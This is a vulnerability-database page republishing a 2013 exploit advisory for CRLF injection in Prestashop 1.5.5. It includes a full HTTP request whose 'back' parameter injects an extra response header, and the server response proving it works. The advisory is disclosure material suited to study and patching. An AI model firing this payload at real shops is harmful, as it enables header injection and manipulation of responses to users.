Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Prestashop v1.5.5 - CRLF Injection Vulnerability

🗓️ 07 Sep 2013 00:00:00Reported by EsacType 
zdt
 zdt🔗 0day.today👁 40 Views

Prestashop v1.5.5 CRLF Injection Vulnerability allows injection of extra HTTP headers for control over conten

Code
##############################################################
#Exploit Title: Prestashop v1.5.5 - CRLF Injection Vulnerability 
#Official site: http://www.prestashop.com
#Official Demo : http://demo-store.prestashop.com/
#Risk Level: Medium
#Exploit Author: Esac
#Homepage author : www.iss4m.ma
#Email author : [email protected]
#Last Checked: 06/09/2013
#############################################################
 
 
+----------+
| OVERVIEW |
+----------+
 
PrestaShop is the most reliable and flexible Open-source e-commerce software. Since 2007,PrestaShop has revolutionized the industry by providing features that
engage shoppers and increase online sales. The Prestateam consists of over 100 passionate individuals and more than 350,000 community members dedicated to innovated technology.
It has more than 2.000.000 downloads and won the best open-source e-commerce software in the last few years.

When installing and analyzing PrestaShop on a secure environment I discovered that it's vulnerable for CRLF injection vulnerability that may allow an attacker to include extra HTTP headers when viewing web pages. If Prestashop is called from the command line, carriage return and line feed (CRLF) characters may be included in the specified URL. These characters are not escaped when the input is used to construct a HTTP request.
 
Exploitation of this flaw may allow an attacker to inject additional HTTP headers into a request. Abuse of the 'Host' header may cause the request to be served as if made to a different domain, possibly providing the attacker with more control over the content returned.
 
This vulnerability has been reported for Prestashop v1.5.5 and may be other versions are affected.


+---------------------------------------------------------------------------------------+


HTTP Headers Request  :


POST /fr/adresse HTTP/1.1
Content-Length: 389
Content-Type: application/x-www-form-urlencoded
Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZGtZ3A7mQpE2jo2VD0mzY3wtqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgGGr4hYKm51D3wGkqO0lLNZowKzQVgJqWqSLngur8z4I%3D000404
Host: demo-store.prestashop.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&alias=1&back=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection&city=San%20Francisco&company=Acunetix&dni=1&firstname=tdupumgx&id_country=231&id_state=&lastname=carbrbbm&other=1&phone=555-666-0606&phone_mobile=555-666-0606&postcode=94102&select_address=1&submitAddress=Valider&token=fa85a76b06b6cd05245288ea8006175a&vat_number=1


HTTP Headers Response :

HTTP/1.1 302 Found
Date: Wed, 28 Aug 2013 10:28:39 GMT
Server: Apache
Set-Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZG1%2BptPMOxtxYYBfzPV0v8ktqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgq4zKl3PuSt10RxAAYjxEcdQEEu5W1AjY6PXJwUz1e34%3D000404; expires=Tue, 17-Sep-2013 10:28:39 GMT; path=/; domain=demo-store.prestashop.com; httponly
Location: http://demo-store.prestashop.com/fr/
 ZSL-Custom-Header:love_injection
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


 
+----------------------------------------------------------------------------------------+
 
Knowledge is not an Object , it's a flaw :)
Greetz : White Tarbouch TEAM - Cobra 
WwW.Iss4m.Ma
./Issam IEBOUBEN Aka Esac

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Sep 2013 00:00Current
7.4High risk
Vulners AI Score7.4
prestashopcrlf injectionvulnerabilityhttp headerssecurityexploitweb pagesattackopen-source e-commerce softwaretechnology
40